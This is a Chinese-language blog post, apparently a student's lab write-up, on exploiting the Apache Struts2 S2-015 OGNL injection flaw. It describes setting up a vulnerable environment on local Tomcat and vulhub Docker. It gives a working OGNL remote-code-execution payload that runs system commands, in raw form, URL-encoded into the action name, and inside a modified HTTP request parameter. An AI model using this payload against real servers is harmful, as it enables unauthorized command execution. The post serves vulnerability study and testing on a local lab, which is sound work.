Struts-S2-015漏洞利用(含环境搭建、含POC)

96
心如水_0b05
2017.07.29 00:23* 字数 702

struts-s2-015

此文仅供大家交流学习,严禁非法使用

一、参考网址:

http://struts.apache.org/docs/s2-015.html
http://www.inbreak.net/archives/507#comment-7463
https://github.com/phith0n/vulhub/tree/master/struts2/s2-015

二、 影响版本:

2.0.0 - 2.3.14.2

三、 漏洞介绍:

Struts 2允许基于通配符定义动作映射,如下例所示:

<action name="*" class="example.ExampleSupport">
    <result>/example/{1}.jsp</result>
</action>

如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。这个漏洞是两个问题的组合:
1.请求的操作名称未被转义或再次检查白名单
2.在TextParseUtil.translateVariables使用组合$和%开放字符时对OGNL表达式进行双重评估。

四、 环境搭建:

(windows)

环境搭建,类似与一下安装showcase,相同方法可以部署blank

  • 下载/struts/2.1.6

下载地址:http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip

  • 下载安装xampp

  • 部署showcase

  • 解压

2.1.6_1.png

2.1.6_2.png
  • 复制到.
2.1.6_3.png
  • 重启tomcat
2.1.6_4.png
  • 已成功自动部署
2.1.6_5.png
  • 找到example.xml
    打开


    1.png

    发现已经存在通配符*


    2.png

    找到helloworld.java 打开
    3.png

    发现也不用改
    4.png
  • 运行struts2-blank应用程序
    Windows环境基本搭建完毕,以下只演示windows环境下渗透测试

环境搭建:(ubuntu)

curl -s https://bootstrap.pypa.io/get-pip.py | python3

  • 安装docker
    apt-get update && apt-get install docker.io

  • 启动docker服务
    service docker start

  • 安装compose
    pip install docker-compose

注意要先ssh连接,将公钥添加到github上,具体参照网上教程

  • 拉取项目
    git clone git@github.com:phith0n/vulhub.git
    cd vulhub

  • 进入某一个漏洞/环境的目录
    cd nginx_php5_mysql

  • 自动化编译环境
    docker-compose build

  • 启动整个环境
    docker-compose up -d

POC(此POC是在官方删除了setAllowStaticMethodAccess后的解决方法)

${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()),#q}

六、 测试网址:

原始网址为:

http://127.0.0.1:8080/struts2-blank-2.1.6/example/HelloWorld.action

修改后为:

http://127.0.0.1:8080/struts2-blank-2.1.6/example/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%2C%23q%7D.action

七、执行结果

出现了404
可能在怀疑poc有问题?还是在怀疑poc没有放到正确位置
仔细观察404,发现已经成功了


5.png

同样ipconfig也能显示完整信息

八、二次引用执行漏洞

按照上面路径再次打开example.xml


6.png

修改后为


7.png

这里配置了 <param name="errorMessage">${message}</param>,其中 message 为 ParamAction 中的一个私有变量,这样配置会导致触发该 Result 时,Struts2 会从请求参数中获取 message 的值,并在解析过程中,触发了 OGNL 表达式执行,因此只用提交 %{1111*2} 作为其变量值提交就会得到执行。这里需要注意的是这里的二次解析是因为在 struts.xml 中使用 ${param} 引用了 Action 中的变量所导致的,并不针对于 type="httpheader" 这种返回方式。

原始数据包为

GET /struts2-blank-2.1.6/example/HelloWorld.action HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4305142080E1838AA532E10080BE9EF1
Connection: close

修改后为

GET /struts2-blank-2.1.6/example/HelloWorld.action?message=%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%2C%23q%7D HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4305142080E1838AA532E10080BE9EF1
Connection: close

执行结果


8.png

八、 至此,该漏洞基本利用完毕

本人还是一个未毕业的小萌新,希望大家多多帮助,有问题请发送邮件到xrzsupupup@163.com不胜感激,我也会尽量去帮助大家

坚决做一名白帽子

日记本